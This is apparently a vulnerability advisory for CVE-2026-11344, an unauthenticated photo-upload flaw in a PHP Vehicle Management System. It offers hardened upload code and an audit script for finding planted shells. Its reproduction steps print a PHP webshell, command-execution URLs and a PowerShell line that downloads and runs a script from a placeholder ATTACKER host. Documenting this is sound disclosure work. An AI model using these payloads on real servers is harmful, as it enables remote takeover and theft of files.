VYPR
Severity: High (7.3, NVD) · Advisory · Published Jun 5, 2026 · Updated Jun 5, 2026

CVE-2026-11344

Description

Unauthenticated remote code execution via unrestricted file upload in Vehicle Management System 1.0's newdriver.php.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A vulnerability exists in code-projects Vehicle Management System version 1.0, specifically within the newdriver.php file of the New Driver Registration Form component. The photo argument of a multipart/form-data POST request allows unrestricted file uploads. Version 1.0 is affected [1].

Exploitation

An unauthenticated attacker can exploit this vulnerability by directly accessing the newdriver.php page without any session validation or credentials. The attacker can then submit the driver registration form, uploading a PHP webshell disguised as a photo. This webshell will be saved to the /picture/ directory, allowing the attacker to execute arbitrary OS commands on the server by navigating to the uploaded shell [1].

Impact

Successful exploitation of this vulnerability grants the attacker full Remote Code Execution (RCE) capabilities. The commands will be executed with the privileges of the web server process, potentially leading to a complete compromise of the server [1].

Mitigation

No specific patch or fixed version has been disclosed in the available references. The vendor's website is available for general information [2].

AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 3

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"The application fails to validate uploaded file types, allowing arbitrary file uploads."

Attack vector

An unauthenticated attacker can directly access the newdriver.php endpoint, which handles new driver registrations. The handler for the 'photo' upload parameter performs no validation of the file type, so an attacker can upload a PHP webshell. The file is saved to the /picture/ directory, from which it can be requested and executed, letting the attacker run arbitrary OS commands on the server. The same vulnerability exists in the newvehicle.php file [ref_id=1].

Affected code

The vulnerability resides in the newdriver.php and newvehicle.php files, specifically within the 'photo' upload parameter. The application saves the uploaded shell to the /picture/ directory [ref_id=1].

What the fix does

The advisory does not specify any patches or fixes. Remediation guidance suggests implementing proper file type validation, extension filtering, and content inspection for all file uploads to prevent unrestricted file uploads.
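The remediation described above, as an added example (not code from the project): a hardened replacement for the unvalidated 'photo' move in newdriver.php and newvehicle.php. It assumes the form still posts the file as $_FILES['photo'] and that UPLOAD_DIR is a directory outside the web root, writable by the web server.

```php
<?php
declare(strict_types=1);

// Assumed: a directory outside the web root, writable by the web server and
// never served directly, so nothing stored here can be requested as a script.
const UPLOAD_DIR = __DIR__ . '/../private_uploads/pictures';
const MAX_BYTES  = 2 * 1024 * 1024;
// Allowlist keyed by the MIME type detected from the bytes; the value is the
// extension the server assigns (the client-supplied name is never reused).
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

/**
 * Validate the 'photo' upload and store it under a server-chosen name.
 * Returns the stored filename; throws on any validation failure.
 */
function storePhoto(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload missing or invalid');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Extension filtering on the client-supplied name (defence in depth only).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png'], true)) {
        throw new RuntimeException('Extension not allowed');
    }
    // Content inspection: detect the type from the bytes, not from
    // $_FILES['type'], and require the image to actually decode.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime]) || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Content is not an allowed image');
    }
    // Random name, extension taken from the detected type. Even a polyglot
    // (valid image with PHP appended) cannot run: it sits outside the web root,
    // carries an image extension and gets no execute bit where that applies.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);
    return $name;
}
```

The registration handler calls storePhoto($_FILES['photo'] ?? []) inside a try/catch and answers HTTP 400 on a RuntimeException; stored images are then served by a small read-only script that sets an image Content-Type, not by a direct path under the web root.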

Preconditions

  • Authentication: No authentication is required to access the vulnerable endpoints [ref_id=1].
  • Network: The attack can be initiated remotely over the network [ref_id=1].

Reproduction

Step 1 — Confirm unauthenticated access to newdriver.php

Open a fresh browser with no session (incognito/private window). Navigate directly to the endpoint:

http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

The New Driver Form loads successfully with no authentication check and no redirect to login.

Step 2 — Prepare the PHP webshell

Create a simple PHP command execution webshell:

<?php system($_GET['cmd']); ?>

Save it as shell.php (or any .php filename).

Step 3 — Submit the form with the webshell as the photo

Fill in the driver form fields with any values and select the PHP webshell as the photo upload:

  Driver Name: test
  Mobile: 1234567890
  Driver Joining Date: 2026-05-19
  National ID: test
  License No: test
  License End Date: 2026-05-30
  Driver Address: test
  Photo: shell.php ← PHP webshell uploaded here

Click Submit Query.

Step 4 — Shell upload confirmed

The application responds with "Registration Completed!", confirming the PHP shell was accepted and saved with no validation.

Step 5 — Execute arbitrary commands via the uploaded shell

Navigate to the uploaded shell in the /picture/ directory and pass OS commands via the cmd parameter:

http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

The server executes the command and returns the output:

Step 6 — Further command execution examples

# Read sensitive files
http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# List web root
http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Full reverse shell via PowerShell
http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Second Affected Endpoint — newvehicle.php

The identical vulnerability exists in newvehicle.php. An unauthenticated attacker can access the Add New Vehicle form, upload a PHP webshell via the vehicle photo field, and achieve RCE through the same method.

http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

Both endpoints share the same root cause: no session validation and no file upload restrictions [ref_id=1].
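Because no patch exists and both endpoints write straight into /picture/, an operator should assume that directory may already hold a shell. The following audit script is an added example (not part of the advisory or the project): it flags anything under the upload directory that carries a server-executable extension, contains a PHP open tag (including image/PHP polyglots), or whose detected content type is not an image. The PICTURE_DIR path is an assumption about where the application stores uploads.

```php
<?php
declare(strict_types=1);

// Assumed: the application's upload directory, relative to this script.
const PICTURE_DIR = __DIR__ . '/picture';

/**
 * Audit an upload directory and return suspicious files as [path => reason].
 * Checks, in order: server-executable extension, PHP open tag anywhere in
 * the file (catches polyglots that still decode as images), and content
 * whose detected MIME type is not image/*.
 */
function auditPictureDir(string $dir): array
{
    $findings = [];
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    foreach (new DirectoryIterator($dir) as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $path = $entry->getPathname();
        $ext  = strtolower($entry->getExtension());
        $data = (string) file_get_contents($path);
        if (preg_match('/^(php\d?|phtml|phar|htaccess)$/', $ext)) {
            $findings[$path] = "server-executable extension .$ext";
        } elseif (stripos($data, '<?php') !== false || strpos($data, '<?=') !== false) {
            $findings[$path] = 'PHP open tag inside file (possible polyglot)';
        } elseif (strpos((string) $finfo->file($path), 'image/') !== 0) {
            $findings[$path] = 'content is not an image';
        }
    }
    return $findings;
}

foreach (auditPictureDir(PICTURE_DIR) as $path => $reason) {
    echo "SUSPICIOUS: $path ($reason)\n";
}
```

Flagged files should be preserved for forensics before removal, and the web server access log searched for requests to /picture/ with a .php path or a cmd= query, which is how the uploaded shell is reached.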

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
